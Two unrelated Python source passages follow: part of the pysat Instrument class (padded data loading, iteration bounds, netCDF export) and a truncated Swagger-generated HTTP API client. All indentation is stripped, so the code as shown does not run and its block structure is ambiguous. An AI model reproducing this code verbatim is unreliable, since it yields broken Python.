output_str += 'Time range: ' + self.data.index[0].strftime('%m/%d/%Y %H:%M:%S') + ' --- '
output_str += self.data.index[-1].strftime('%m/%d/%Y %H:%M:%S')+'\n'
output_str += 'Number of Times: ' + str(len(self.data.index)) + '\n'
output_str += 'Number of variables: ' + str(len(self.data.columns)) + '\n'
output_str += '\nVariable Names:'+'\n'
num = len(self.data.columns)//3
for i in np.arange(num):
output_str += self.data.columns[3 * i].ljust(30)
output_str += self.data.columns[3 * i + 1].ljust(30)
output_str += self.data.columns[3 * i + 2].ljust(30)+'\n'
for i in np.arange(len(self.data.columns) - 3 * num):
output_str += self.data.columns[i+3*num].ljust(30)
output_str += '\n'
else:
output_str += 'No loaded data.'+'\n'
output_str += '\n'
return output_str
def _load_data(self, date=None, fid=None):
"""
Load data for an instrument on given date or fid, dependng upon input.
"""
if fid is not None:
# get filename based off of index value
fname = self.files[fid:fid+1]
elif date is not None:
fname = self.files[date: date+pds.DateOffset(days=1)]
else:
raise ValueError('Must supply either a date or file id number.')
if len(fname) > 0:
load_fname = [os.path.join(self.files.data_path, f) for f in fname]
data, mdata = self._load_rtn(load_fname, tag=self.tag,
sat_id=self.sat_id, **self.kwargs)
else:
data = DataFrame(None)
mdata = _meta.Meta()
output_str = '{platform} {name} {tag} {sat_id}'
output_str = output_str.format(platform=self.platform,
name=self.name, tag=self.tag,
sat_id=self.sat_id)
if not data.empty:
if not isinstance(data, DataFrame):
raise TypeError(' '.join(('Data returned by instrument load',
'routine must be a pandas.DataFrame')))
if not isinstance(mdata, _meta.Meta):
raise TypeError('Metadata returned must be a pysat.Meta object')
if date is not None:
output_str = ' '.join(('Returning', output_str, 'data for', date.strftime('%D')))
else:
if len(fname) == 1:
# this check was zero
output_str = ' '.join(('Returning', output_str, 'data from', fname[0]))
else:
output_str = ' '.join(('Returning', output_str, 'data from', fname[0], '::', fname[-1]))
else:
# no data signal
output_str = ' '.join(('No', output_str, 'data for', date.strftime('%D')))
# remove extra spaces, if any
output_str = " ".join(output_str.split())
print (output_str)
return data, mdata
def _load_next(self):
"""Load the next days data (or file) without incrementing the date.
Repeated calls will not advance date/file and will produce the same data
Uses info stored in object to either increment the date,
or the file. Looks for self._load_by_date flag.
"""
if self._load_by_date:
next_date = self.date + pds.DateOffset(days=1)
return self._load_data(date=next_date)
else:
return self._load_data(fid=self._fid+1)
def _load_prev(self):
"""Load the next days data (or file) without decrementing the date.
Repeated calls will not decrement date/file and will produce the same data
Uses info stored in object to either decrement the date,
or the file. Looks for self._load_by_date flag.
"""
if self._load_by_date:
prev_date = self.date - pds.DateOffset(days=1)
return self._load_data(date=prev_date)
else:
return self._load_data(fid=self._fid-1)
def _set_load_parameters(self, date=None, fid=None):
self.date = date
self._fid = fid
if date is not None:
year, doy = utils.getyrdoy(date)
self.yr = year
self.doy = doy
self._load_by_date = True
else:
self.yr = None
self.doy = None
self._load_by_date = False
def load(self, yr=None, doy=None, date=None, fname=None, fid=None,
verifyPad=False):
"""Load instrument data into Instrument object .data.
Parameters
----------
yr : integer
year for desired data
doy : integer
day of year
date : datetime object
date to load
fname : 'string'
filename to be loaded
verifyPad : boolean
if True, padding data not removed (debug purposes)
Returns
--------
Void. Data is added to self.data
Note
----
Loads data for a chosen instrument into .data. Any functions chosen
by the user and added to the custom processing queue (.custom.add)
are automatically applied to the data before it is available to
user in .data.
"""
# set options used by loading routine based upon user input
if date is not None:
self._set_load_parameters(date=date, fid=None)
# increment
inc = pds.DateOffset(days=1)
curr = date
elif (yr is not None) & (doy is not None):
date = pds.datetime(yr, 1, 1) + pds.DateOffset(days=(doy-1))
self._set_load_parameters(date=date, fid=None)
# increment
inc = pds.DateOffset(days=1)
curr = self.date
elif fname is not None:
# date will have to be set later by looking at the data
self._set_load_parameters(date=None, fid=self.files.get_index(fname))
# increment one file at a time
inc = 1
curr = self._fid.copy()
elif fid is not None:
self._set_load_parameters(date=None, fid=fid)
# increment one file at a time
inc = 1
curr = fid
else:
estr = 'Must supply a yr,doy pair, or datetime object, or filename'
estr = '{:s} to load data from.'.format(estr)
raise TypeError(estr)
self.orbits._reset()
# if pad or multi_file_day is true, need to have a three day/file load
loop_pad = self.pad if self.pad is not None else pds.DateOffset(seconds=0)
if (self.pad is not None) | self.multi_file_day:
if self._next_data.empty & self._prev_data.empty:
# data has not already been loaded for previous and next days
# load data for all three
print('Initializing three day/file window')
# using current date or fid
self._prev_data, self._prev_meta = self._load_prev()
self._curr_data, self._curr_meta = \
self._load_data(date=self.date, fid=self._fid)
self._next_data, self._next_meta = self._load_next()
else:
# moving forward in time
if self._next_data_track == curr:
self._prev_data = self._curr_data
self._prev_meta = self._curr_meta
self._curr_data = self._next_data
self._curr_meta = self._next_meta
self._next_data, self._next_meta = self._load_next()
# moving backward in time
elif self._prev_data_track == curr:
self._next_data = self._curr_data
self._next_meta = self._curr_meta
self._curr_data = self._prev_data
self._curr_meta = self._prev_meta
self._prev_data, self._prev_meta = self._load_prev()
# jumped in time/or switched from filebased to date based access
else:
self._prev_data, self._prev_meta = self._load_prev()
self._curr_data, self._curr_meta = \
self._load_data(date=self.date, fid=self._fid)
self._next_data, self._next_meta = self._load_next()
# make sure datetime indices for all data is monotonic
if not self._prev_data.index.is_monotonic_increasing:
self._prev_data.sort_index(inplace=True)
if not self._curr_data.index.is_monotonic_increasing:
self._curr_data.sort_index(inplace=True)
if not self._next_data.index.is_monotonic_increasing:
self._next_data.sort_index(inplace=True)
# make tracking indexes consistent with new loads
self._next_data_track = curr + inc
self._prev_data_track = curr - inc
# attach data to object
if not self._curr_data.empty:
self.data = self._curr_data.copy()
self.meta = self._curr_meta.copy()
else:
self.data = DataFrame(None)
# line below removed as it would delete previous meta, if any
# if you end a seasonal analysis with a day with no data, then
# no meta: self.meta = _meta.Meta()
# multi file days can extend past a single day, only want data from
# specific date if loading by day
# set up times for the possible data padding coming up
if self._load_by_date:
#print ('double trouble')
first_time = self.date
first_pad = self.date - loop_pad
last_time = self.date + pds.DateOffset(days=1)
last_pad = self.date + pds.DateOffset(days=1) + loop_pad
want_last_pad = False
# loading by file, can't be a multi_file-day flag situation
elif (not self._load_by_date) and (not self.multi_file_day):
#print ('single trouble')
first_time = self._curr_data.index[0]
first_pad = first_time - loop_pad
last_time = self._curr_data.index[-1]
last_pad = last_time + loop_pad
want_last_pad = True
else:
raise ValueError("multi_file_day and loading by date are effectively equivalent."+
"Can't have multi_file_day and load by file.")
#print (first_pad, first_time, last_time, last_pad)
# pad data based upon passed parameter
if (not self._prev_data.empty) & (not self.data.empty):
padLeft = self._prev_data.loc[first_pad : self.data.index[0]]
if len(padLeft) > 0:
if (padLeft.index[-1] == self.data.index[0]) :
padLeft = padLeft.iloc[:-1, :]
self.data = pds.concat([padLeft, self.data])
if (not self._next_data.empty) & (not self.data.empty):
padRight = self._next_data.loc[self.data.index[-1] : last_pad]
if len(padRight) > 0:
if (padRight.index[0] == self.data.index[-1]) :
padRight = padRight.iloc[1:, :]
self.data = pds.concat([self.data, padRight])
self.data = self.data.ix[first_pad : last_pad]
# want exclusive end slicing behavior from above
if (self.data.index[-1] == last_pad) & (not want_last_pad):
self.data = self.data.iloc[:-1, :]
## drop any possible duplicate index times
##self.data.drop_duplicates(inplace=True)
#self.data = self.data[~self.data.index.duplicated()]
# if self.pad is False, load single day
else:
self.data, meta = self._load_data(date=self.date, fid=self._fid)
if not self.data.empty:
self.meta = meta
# check if load routine actually returns meta
if self.meta.data.empty:
self.meta[self.data.columns] = {'long_name': self.data.columns,
'units': ['']*len(self.data.columns)}
# if loading by file set the yr, doy, and date
if not self._load_by_date:
if self.pad is not None:
temp = first_time
else:
temp = self.data.index[0]
self.date = pds.datetime(temp.year, temp.month, temp.day)
self.yr, self.doy = utils.getyrdoy(self.date)
if not self.data.empty:
self._default_rtn(self)
# clean
if (not self.data.empty) & (self.clean_level != 'none'):
self._clean_rtn(self)
# apply custom functions
if not self.data.empty:
self.custom._apply_all(self)
# remove the excess padding, if any applied
if (self.pad is not None) & (not self.data.empty) & (not verifyPad):
self.data = self.data[first_time : last_time]
if (self.data.index[-1] == last_time) & (not want_last_pad):
self.data = self.data.iloc[:-1, :]
# transfer any extra attributes in meta to the Instrument object
self.meta.transfer_attributes_to_instrument(self)
sys.stdout.flush()
return
def download(self, start, stop, freq='D', user=None, password=None):
"""Download data for given Instrument object from start to stop.
Parameters
----------
start : pandas.datetime
start date to download data
stop : pandas.datetime
stop date to download data
freq : string
Stepsize between dates for season, 'D' for daily, 'M' monthly
(see pandas)
user : string
username, if required by instrument data archive
password : string
password, if required by instrument data archive
Note
----
Data will be downloaded to pysat_data_dir/patform/name/tag
If Instrument bounds are set to defaults they are updated
after files are downloaded.
"""
import errno
# make sure directories are there, otherwise create them
try:
os.makedirs(self.files.data_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
print('Downloading data to: ', self.files.data_path)
date_array = utils.season_date_range(start, stop, freq=freq)
if user is None:
self._download_rtn(date_array,
tag=self.tag,
sat_id=self.sat_id,
data_path=self.files.data_path)
else:
self._download_rtn(date_array,
tag=self.tag,
sat_id=self.sat_id,
data_path=self.files.data_path,
user=user,
password=password)
# get current file date range
first_date = self.files.start_date
last_date = self.files.stop_date
print('Updating pysat file list')
self.files.refresh()
# if instrument object has default bounds, update them
if len(self.bounds[0]) == 1:
if(self.bounds[0][0] == first_date and
self.bounds[1][0] == last_date):
print('Updating instrument object bounds.')
self.bounds = None
@property
def bounds(self):
"""Boundaries for iterating over instrument object by date or file.
Parameters
----------
start : datetime object, filename, or None (default)
start of iteration, if None uses first data date.
list-like collection also accepted
end : datetime object, filename, or None (default)
end of iteration, inclusive. If None uses last data date.
list-like collection also accepted
Note
----
Both start and stop must be the same type (date, or filename) or None
Examples
--------
::
inst = pysat.Instrument(platform=platform,
name=name,
tag=tag)
start = pysat.datetime(2009,1,1)
stop = pysat.datetime(2009,1,31)
inst.bounds = (start,stop)
start2 = pysat.datetetime(2010,1,1)
stop2 = pysat.datetime(2010,2,14)
inst.bounds = ([start, start2], [stop, stop2])
"""
return self._iter_start, self._iter_stop
@bounds.setter
def bounds(self, value=None):
if value is None:
value = (None, None)
if len(value) < 2:
raise ValueError('Must supply both a start and end date/file' +
'Supply None if you want the first/last possible')
start = value[0]
end = value[1]
# get the frequency, or step size, of season
if len(value) == 3:
step = value[2]
else:
# default do daily
step = 'D'
if (start is None) and (end is None):
# set default
self._iter_start = [self.files.start_date]
self._iter_stop = [self.files.stop_date]
self._iter_type = 'date'
if self._iter_start[0] is not None:
# check here in case Instrument is initialized with no input
self._iter_list = utils.season_date_range(self._iter_start, self._iter_stop, freq=step)
elif (hasattr(start, '__iter__') and not isinstance(start,str)) and (hasattr(end, '__iter__') and not isinstance(end,str)):
base = type(start[0])
for s, t in zip(start, end):
if (type(s) != type(t)) or (type(s) != base):
raise ValueError('Start and end items must all be of the same type')
if isinstance(start[0], str):
self._iter_type = 'file'
self._iter_list = self.files.get_file_array(start, end)
elif isinstance(start[0], pds.datetime):
self._iter_type = 'date'
self._iter_list = utils.season_date_range(start, end, freq=step)
else:
raise ValueError('Input is not a known type, string or datetime')
self._iter_start = start
self._iter_stop = end
elif (hasattr(start, '__iter__') and not isinstance(start,str)) or (hasattr(end, '__iter__') and not isinstance(end,str)):
raise ValueError('Both start and end must be iterable if one bound is iterable')
elif isinstance(start, str) or isinstance(end, str):
if isinstance(start, pds.datetime) or isinstance(end, pds.datetime):
raise ValueError('Not allowed to mix file and date bounds')
if start is None:
start = self.files[0]
if end is None:
end = self.files.files[-1]
self._iter_start = [start]
self._iter_stop = [end]
self._iter_list = self.files.get_file_array(self._iter_start, self._iter_stop)
self._iter_type = 'file'
elif isinstance(start, pds.datetime) or isinstance(end, pds.datetime):
if start is None:
start = self.files.start_date
if end is None:
end = self.files.stop_date
self._iter_start = [start]
self._iter_stop = [end]
self._iter_list = utils.season_date_range(start, end, freq=step)
self._iter_type = 'date'
else:
raise ValueError('Provided an invalid combination of bounds. ' +
'if specifying by file, both bounds must be by file. Other ' +
'combinations of datetime objects and None are allowed.')
def __iter__(self):
"""Iterates instrument object by loading subsequent days or files.
Note
----
Limits of iteration, and iteration type (date/file)
set by `bounds` attribute.
Default bounds are the first and last dates from files on local system.
Examples
--------
::
inst = pysat.Instrument(platform=platform,
name=name,
tag=tag)
start = pysat.datetime(2009,1,1)
stop = pysat.datetime(2009,1,31)
inst.bounds = (start,stop)
for inst in inst:
print('Another day loaded', inst.date)
"""
if self._iter_type == 'file':
for fname in self._iter_list:
self.load(fname=fname)
yield self
elif self._iter_type == 'date':
for date in self._iter_list:
self.load(date=date)
yield self
def next(self, verifyPad=False):
"""Manually iterate through the data loaded in Instrument object.
Bounds of iteration and iteration type (day/file) are set by
`bounds` attribute.
Note
----
If there were no previous calls to load then the
first day(default)/file will be loaded.
"""
if self._iter_type == 'date':
if self.date is not None:
idx, = np.where(self._iter_list == self.date)
if (len(idx) == 0) | (idx+1 >= len(self._iter_list)):
raise StopIteration('Outside the set date boundaries.')
else:
idx += 1
self.load(date=self._iter_list[idx[0]], verifyPad=verifyPad)
else:
self.load(date=self._iter_list[0], verifyPad=verifyPad)
elif self._iter_type == 'file':
if self._fid is not None:
first = self.files.get_index(self._iter_list[0])
last = self.files.get_index(self._iter_list[-1])
if (self._fid < first) | (self._fid+1 > last):
raise StopIteration('Outside the set file boundaries.')
else:
self.load(fname=self._iter_list[self._fid+1-first], verifyPad=verifyPad)
else:
self.load(fname=self._iter_list[0], verifyPad=verifyPad)
def prev(self, verifyPad=False):
"""Manually iterate backwards through the data in Instrument object.
Bounds of iteration and iteration type (day/file)
are set by `bounds` attribute.
Note
----
If there were no previous calls to load then the
first day(default)/file will be loaded.
"""
if self._iter_type == 'date':
if self.date is not None:
idx, = np.where(self._iter_list == self.date)
if (len(idx) == 0) | (idx-1 < 0):
raise StopIteration('Outside the set date boundaries.')
else:
idx -= 1
self.load(date=self._iter_list[idx[0]], verifyPad=verifyPad)
else:
self.load(date=self._iter_list[-1], verifyPad=verifyPad)
elif self._iter_type == 'file':
if self._fid is not None:
first = self.files.get_index(self._iter_list[0])
last = self.files.get_index(self._iter_list[-1])
if (self._fid-1 < first) | (self._fid > last):
raise StopIteration('Outside the set file boundaries.')
else:
self.load(fname=self._iter_list[self._fid-1-first], verifyPad=verifyPad)
else:
self.load(fname=self._iter_list[-1], verifyPad=verifyPad)
def _get_data_info(self, data, format):
# get type of data
data_type = data.dtype
# check if older format
if format[:7] == 'NETCDF3':
old_format = True
else:
old_format = False
# check for object type
if data_type != np.dtype('O'):
# simple data, not an object
# no 64bit ints in netCDF3
if (data_type == np.int64) & old_format:
data = data.astype(np.int32)
if data_type == np.dtype('<M8[ns]'):
if not old_format:
data_type = np.int64
else:
data_type = np.float
datetime_flag = True
else:
datetime_flag = False
else:
# dealing with a more complicated object
sub_d = data.loc[0]
return data, data_type, datetime_flag
def to_netcdf4(self, fname=None, format=None, base_instrument=None):
"""Stores loaded data into a netCDF3/4 file.
Parameters
----------
fname : string
full path to save instrument object to
format : string
format keyword passed to netCDF4 routine
NETCDF3_CLASSIC, NETCDF3_64BIT, NETCDF4_CLASSIC, and NETCDF4
base_instrument : pysat.Instrument
used as a comparison, only attributes that are present with
self and not on base_instrument are written to netCDF
Note
----
Stores 1-D data along dimension 'epoch' - the date time index.
Stores object data (e.g. dataframes within series) separately
- The name of the series is used to prepend extra variable
dimensions within netCDF, key_2, key_3; first dimension time
- The index organizing the data stored as key_sample_index
- from_netcdf3 uses this naming scheme to reconstruct data structure
The datetime index is stored as 'UNIX time'. netCDF-3 doesn't support
64-bit integers so it is stored as a 64-bit float. This results in a
loss of datetime precision when converted back to datetime index
up to hundreds of nanoseconds. Use netCDF4 if this is a problem.
All attributes attached to instrument meta are written to netCDF attrs.
"""
import netCDF4
import pysat
if format is None:
format = 'NETCDF4'
else:
format = format.upper()
base_instrument = Instrument() if base_instrument is None else base_instrument
with netCDF4.Dataset(fname, mode='w', format=format) as out_data:
num = len(self.data.index)
out_data.createDimension('epoch', num)
# write out the datetime index
if format == 'NETCDF4':
cdfkey = out_data.createVariable('epoch', 'i8', dimensions=('epoch'),)
cdfkey.units = 'Microseconds since 1970-1-1 00:00:00'
cdfkey[:] = (self.data.index.values.astype(np.int64)*1E-3).astype(np.int64)
else:
# can't store full time resolution
cdfkey = out_data.createVariable('epoch', 'f8', dimensions=('epoch'),)
cdfkey.units = 'Milliseconds since 1970-1-1 00:00:00'
cdfkey[:] = (self.data.index.values.astype(int)*1.E-6).astype(np.float)
cdfkey.long_name = 'UNIX time'
cdfkey.calendar = 'standard'
# store all of the data in dataframe columns
for key in self.data.columns:
# print ('key', key)
# print (self[key])
if self[key].dtype != np.dtype('O'):
# not an object, simple column of data, write it out
if ((self[key].dtype == np.int64) & (format[:7] == 'NETCDF3')):
self[key] = self[key].astype(np.int32)
# check if it is a datetime column
datetime_flag = False
coltype = self[key].dtype
# check for datetime index
if coltype == np.dtype('<M8[ns]'):
if format == 'NETCDF4':
coltype = np.int64
else:
coltype = np.float
datetime_flag = True
# print ('gonna create variable')
cdfkey = out_data.createVariable(key,
coltype,
dimensions=('epoch'), )
# print ('created')
# attach any meta data
try:
new_dict = self.meta[key].to_dict()
if u'_FillValue' in new_dict.keys():
# make sure _FillValue is the same type as the data
new_dict['_FillValue'] = np.array(new_dict['_FillValue']).astype(self[key].dtype)
if u'FillVal' in new_dict.keys():
# make sure _FillValue is the same type as the data
new_dict['FillVal'] = np.array(new_dict['FillVal']).astype(self[key].dtype)
# really attach metadata now
cdfkey.setncatts(new_dict)
except:
print(', '.join(('Unable to find MetaData for',key)) )
if datetime_flag:
if format == 'NETCDF4':
# cdfkey.units = 'Microseconds since 1970-1-1 00:00:00'
cdfkey[:] = (self[key].values.astype(coltype)*1.E-3).astype(coltype)
else:
# cdfkey.units = 'Milliseconds since 1970-1-1 00:00:00'
cdfkey[:] = (self[key].values.astype(coltype)*1.E-6).astype(coltype)
# cdfkey.long_name = 'UNIX time'
else:
# #cdfkey.units = ''
# if self[key].iloc[0].index.name is not None:
# cdfkey.long_name = self[key].iloc[0].index.name
# else:
# cdfkey.long_name = key
cdfkey[:] = self[key].values #.to_native_types()
# attach the data
# cdfkey[:] = self[key].values
else:
if not isinstance(self[0, key], pysat.DataFrame):
# dealing with a string
cdfkey = out_data.createVariable(key,
'S30',
dimensions=('epoch'), )
# attach any meta data
try:
new_dict = self.meta[key].to_dict()
if u'_FillValue' in new_dict.keys():
# make sure _FillValue is the same type as the data
new_dict['_FillValue'] = np.array(new_dict['_FillValue']).astype(self[key].dtype)
if u'FillVal' in new_dict.keys():
# make sure _FillValue is the same type as the data
new_dict['FillVal'] = np.array(new_dict['FillVal']).astype(self[key].dtype)
# really attach metadata now
cdfkey.setncatts(new_dict)
except:
print(', '.join(('Unable to find MetaData for',key)) )
else:
# we are dealing with a more complicated object
# presuming a series with a dataframe in each location
dims = np.shape(self[key].iloc[0])
obj_dim_names = []
for i, dim in enumerate(dims[:-1]):
# don't need to go over last dimension value,
# it covers number of columns
obj_dim_names.append(key+'_dim_%i' % (i+1))
out_data.createDimension(obj_dim_names[-1], dim)
# total dimensions stored for object are epoch plus ones just above
var_dim = tuple(['epoch']+obj_dim_names)
#print (key, var_dim)
# iterate over columns and store
try:
iterable = self[key].iloc[0].columns
is_frame = True
except AttributeError:
# looking at a series, which doesn't have columns
iterable = self[key].iloc[0].name
is_frame = False
for col in iterable:
if is_frame:
coltype = self[key].iloc[0][col].dtype
else:
coltype = self[key].iloc[0].dtype
if ((coltype == np.int64) & (format[:7] == 'NETCDF3')):
coltype = np.int32
#elif coltype == np.dtype('O'):
# if isinstance(self[key].iloc[0][col][0], basestring):
# coltype = 'S1'
#print (key+'_' +col, var_dim, coltype)
cdfkey = out_data.createVariable(key + '_' +col,
coltype,
dimensions=var_dim)
#cdfkey.long_name = col
#cdfkey.units = ''
if is_frame:
# attach any meta data
try:
cdfkey.setncatts(self.meta[key][col].to_dict())
except:
print(', '.join(('Unable to find MetaData for',key,col)) )
# attach data
for i in range(num):
cdfkey[i, :] = self[key].iloc[i][col].values.astype(coltype)
else:
# attach any meta data
cdfkey.setncatts(self.meta[key].to_dict())
# attach data
for i in range(num):
cdfkey[i, :] = self[key].iloc[i].values.astype(coltype)
# store the dataframe index for each time of main dataframe
datetime_flag = False
coltype = self[key].iloc[0].index.dtype
# check for datetime index
if coltype == np.dtype('<M8[ns]'):
if format == 'NETCDF4':
coltype = np.int64
else:
coltype = np.float
datetime_flag = True
#if coltype == np.int64:
# coltype = np.int32
#print (key+'_' + '_ample', var_dim, coltype)
cdfkey = out_data.createVariable(key+'_dim_1',
coltype, dimensions=var_dim)
if datetime_flag:
#print('datetime flag')
if format == 'NETCDF4':
cdfkey.units = 'Microseconds since 1970-1-1 00:00:00'
for i in range(num):
cdfkey[i, :] = (self[key].iloc[i].index.values.astype(coltype)*1.E-3).astype(coltype)
else:
cdfkey.units = 'Milliseconds since 1970-1-1 00:00:00'
for i in range(num):
cdfkey[i, :] = (self[key].iloc[i].index.values.astype(coltype)*1.E-6).astype(coltype)
cdfkey.long_name = 'UNIX time'
else:
#cdfkey.units = ''
if self[key].iloc[0].index.name is not None:
cdfkey.long_name = self[key].iloc[0].index.name
else:
cdfkey.long_name = key
for i in range(num):
cdfkey[i, :] = self[key].iloc[i].index.to_native_types()
# store any non standard attributes
base_attrb = dir(base_instrument)
this_attrb = dir(self)
adict = {}
for key in this_attrb:
if key not in base_attrb:
if key[0] != '_':
adict[key] = self.__getattribute__(key)
# store any non-standard attributes attached to meta
base_attrb = dir(base_instrument.meta)
this_attrb = dir(self.meta)
for key in this_attrb:
if key not in base_attrb:
if key[0] != '_':
adict[key] = self.meta.__getattribute__(key)
adict['pysat_version'] = pysat.__version__
adict['Conventions'] = 'CF-1.6'
# check for binary types
for key in adict.keys():
if isinstance(adict[key], bool):
adict[key] = int(adict[key])
out_data.setncatts(adict)
return
|
|
# coding: utf-8
"""
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import re
import json
import mimetypes
import sys
import tempfile
import threading
from datetime import date, datetime
# python 2 and python 3 compatibility library
from six import PY3, integer_types, iteritems, text_type
from six.moves.urllib.parse import quote
from . import models
from .configuration import Configuration
from .rest import ApiException, RESTClientObject
from builtins import str as text
class ApiClient(object):
"""
Generic API client for Swagger client library builds.
Swagger generic API client. This client handles the client-
server communication, and is invariant across implementations. Specifics of
the methods and models for each application are generated from the Swagger
templates.
NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
Do not edit the class manually.
:param host: The base path for the server to call.
:param header_name: a header to pass when making calls to the API.
:param header_value: a header value to pass when making calls to the API.
"""
PRIMITIVE_TYPES = (float, bool, bytes, text_type) + integer_types
NATIVE_TYPES_MAPPING = {
'int': int,
'long': int if PY3 else long,
'float': float,
'str': str,
'bool': bool,
'date': date,
'datetime': datetime,
'object': object,
}
def __init__(self, host=None, header_name=None, header_value=None, cookie=None):
"""
Constructor of the class.
"""
self.rest_client = RESTClientObject()
self.default_headers = {}
if header_name is not None:
self.default_headers[header_name] = header_value
if host is None:
self.host = Configuration().host
else:
self.host = host
self.cookie = cookie
# Set default User-Agent.
self.user_agent = 'Swagger-Codegen/1.0.0/python'
@property
def user_agent(self):
"""
Gets user agent.
"""
return self.default_headers['User-Agent']
@user_agent.setter
def user_agent(self, value):
"""
Sets user agent.
"""
self.default_headers['User-Agent'] = value
def set_default_header(self, header_name, header_value):
self.default_headers[header_name] = header_value
def __call_api(self, resource_path, method,
path_params=None, query_params=None, header_params=None,
body=None, post_params=None, files=None,
response_type=None, auth_settings=None, callback=None,
_return_http_data_only=None, collection_formats=None, _preload_content=True,
_request_timeout=None):
config = Configuration()
# header parameters
header_params = header_params or {}
header_params.update(self.default_headers)
if self.cookie:
header_params['Cookie'] = self.cookie
if header_params:
header_params = self.sanitize_for_serialization(header_params)
header_params = dict(self.parameters_to_tuples(header_params,
collection_formats))
# path parameters
if path_params:
path_params = self.sanitize_for_serialization(path_params)
path_params = self.parameters_to_tuples(path_params,
collection_formats)
for k, v in path_params:
# specified safe chars, encode everything
resource_path = resource_path.replace(
'{%s}' % k, quote(str(v), safe=config.safe_chars_for_path_param))
# query parameters
if query_params:
query_params = self.sanitize_for_serialization(query_params)
query_params = self.parameters_to_tuples(query_params,
collection_formats)
# post parameters
if post_params or files:
post_params = self.prepare_post_parameters(post_params, files)
post_params = self.sanitize_for_serialization(post_params)
post_params = self.parameters_to_tuples(post_params,
collection_formats)
# auth setting
self.update_params_for_auth(header_params, query_params, auth_settings)
# body
if body:
body = self.sanitize_for_serialization(body)
# request url
url = self.host + resource_path
# perform request and return response
response_data = self.request(method, url,
query_params=query_params,
headers=header_params,
post_params=post_params, body=body,
_preload_content=_preload_content,
_request_timeout=_request_timeout)
self.last_response = response_data
return_data = response_data
if _preload_content:
# deserialize response data
if response_type:
return_data = self.deserialize(response_data, response_type)
else:
return_data = None
if callback:
if _return_http_data_only:
callback(return_data)
else:
callback((return_data, response_data.status, response_data.getheaders()))
elif _return_http_data_only:
return (return_data)
else:
return (return_data, response_data.status, response_data.getheaders())
def sanitize_for_serialization(self, obj):
"""
Builds a JSON POST object.
If obj is None, return None.
If obj is str, int, long, float, bool, return directly.
If obj is datetime.datetime, datetime.date
convert to string in iso8601 format.
If obj is list, sanitize each element in the list.
If obj is dict, return the dict.
If obj is swagger model, return the properties dict.
:param obj: The data to serialize.
:return: The serialized form of data.
"""
if obj is None:
return None
elif isinstance(obj, self.PRIMITIVE_TYPES):
return obj
elif isinstance(obj, list):
return [self.sanitize_for_serialization(sub_obj)
for sub_obj in obj]
elif isinstance(obj, tuple):
return tuple(self.sanitize_for_serialization(sub_obj)
for sub_obj in obj)
elif isinstance(obj, (datetime, date)):
return obj.isoformat()
if isinstance(obj, dict):
obj_dict = obj
else:
# Convert model obj to dict except
# attributes `swagger_types`, `attribute_map`
# and attributes which value is not None.
# Convert attribute name to json key in
# model definition for request.
obj_dict = {obj.attribute_map[attr]: getattr(obj, attr)
for attr, _ in iteritems(obj.swagger_types)
if getattr(obj, attr) is not None}
return {key: self.sanitize_for_serialization(val)
for key, val in iteritems(obj_dict)}
def deserialize(self, response, response_type):
"""
Deserializes response into an object.
:param response: RESTResponse object to be deserialized.
:param response_type: class literal for
deserialized object, or string of class name.
:return: deserialized object.
"""
# handle file downloading
# save response body into a tmp file and return the instance
if response_type == "file":
return self.__deserialize_file(response)
# fetch data from response object
try:
data = json.loads(response.data)
except ValueError:
data = response.data
return self.__deserialize(data, response_type)
def __deserialize(self, data, klass):
"""
Deserializes dict, list, str into an object.
:param data: dict, list or str.
:param klass: class literal, or string of class name.
:return: object.
"""
if data is None:
return None
if type(klass) == str:
if klass.startswith('list['):
sub_kls = re.match('list\[(.*)\]', klass).group(1)
return [self.__deserialize(sub_data, sub_kls)
for sub_data in data]
if klass.startswith('dict('):
sub_kls = re.match('dict\(([^,]*), (.*)\)', klass).group(2)
return {k: self.__deserialize(v, sub_kls)
for k, v in iteritems(data)}
# convert str to class
if klass in self.NATIVE_TYPES_MAPPING:
klass = self.NATIVE_TYPES_MAPPING[klass]
else:
klass = getattr(models, klass)
if klass in self.PRIMITIVE_TYPES:
return self.__deserialize_primitive(data, klass)
elif klass == object:
return self.__deserialize_object(data)
elif klass == date:
return self.__deserialize_date(data)
elif klass == datetime:
return self.__deserialize_datetime(data)
else:
return self.__deserialize_model(data, klass)
def call_api(self, resource_path, method,
path_params=None, query_params=None, header_params=None,
body=None, post_params=None, files=None,
response_type=None, auth_settings=None, callback=None,
_return_http_data_only=None, collection_formats=None, _preload_content=True,
_request_timeout=None):
"""
Makes the HTTP request (synchronous) and return the deserialized data.
To make an async request, define a function for callback.
:param resource_path: Path to method endpoint.
:param method: Method to call.
:param path_params: Path parameters in the url.
:param query_params: Query parameters in the url.
:param header_params: Header parameters to be
placed in the request header.
:param body: Request body.
:param post_params dict: Request post form parameters,
for `application/x-www-form-urlencoded`, `multipart/form-data`.
:param auth_settings list: Auth Settings names for the request.
:param response: Response data type.
:param files dict: key -> filename, value -> filepath,
for `multipart/form-data`.
:param callback function: Callback function for asynchronous request.
If provide this parameter,
the request will be called asynchronously.
:param _return_http_data_only: response data without head status code and headers
:param collection_formats: dict of collection formats for path, query,
header, and post parameters.
:param _preload_content: if False, the urllib3.HTTPResponse object will be returned without
reading/decoding response data. Default is True.
:param _request_timeout: timeout setting for this request. If one number provided, it will be total request
timeout. It can also be a pair (tuple) of (connection, read) timeouts.
:return:
If provide parameter callback,
the request will be called asynchronously.
The method will return the request thread.
If parameter callback is None,
then the method will return the response directly.
"""
if callback is None:
return self.__call_api(resource_path, method,
path_params, query_params, header_params,
body, post_params, files,
response_type, auth_settings, callback,
_return_http_data_only, collection_formats, _preload_content, _request_timeout)
else:
thread = threading.Thread(target=self.__call_api,
args=(resource_path, method,
path_params, query_params,
header_params, body,
post_params, files,
response_type, auth_settings,
callback, _return_http_data_only,
collection_formats, _preload_content, _request_timeout))
thread.start()
return thread
def request(self, method, url, query_params=None, headers=None,
post_params=None, body=None, _preload_content=True, _request_timeout=None):
"""
Makes the HTTP request using RESTClient.
"""
if method == "GET":
return self.rest_client.GET(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "HEAD":
return self.rest_client.HEAD(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "OPTIONS":
return self.rest_client.OPTIONS(url,
